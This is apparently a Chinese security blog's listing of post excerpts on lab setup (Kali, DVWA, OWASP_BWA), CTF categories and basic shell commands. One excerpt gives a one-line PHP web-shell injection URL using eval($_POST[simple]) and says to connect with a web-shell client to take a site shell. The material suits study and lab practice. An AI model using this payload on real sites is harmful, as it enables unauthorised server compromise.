摘要：一、 工具集：Linux: Kali最新版(A/P:root/toor)、Windows7/10. 靶机：OWASP_BWA(A/P:root/owaspbwa)、DVWA、Mutillidae、Web for pentester、 阅读全文

摘要：构建一句话木马，密码为simple: url/search.php?searchtype=5&tid=&area=eval($_POST[simple]) 之后使用菜刀进行链接，密码为simple，获取网站目录shell。 阅读全文

摘要：PWN,Reverse：偏重对汇编，逆向的理解； Gypto：偏重对数学，算法的深入学习； Web：偏重对技巧沉淀，快速搜索能力的挑战； Mic：则更为复杂，所有与计算机安全挑战有关的都算在其中 常规做法; A方向：PWN+Reverse+Gypto,随机搭配； B方向：Web+Misc组合； 都要 阅读全文

摘要：zai 获得Shell权限之后，可使用如下命令对系统进行文件操作： cd 后跟相应参数： cd ../ 返回上一级目录 cd　+路径 跳转至制定目录（如果路径存在且正确的话） type flag.txt 查看文本文件中数据。 阅读全文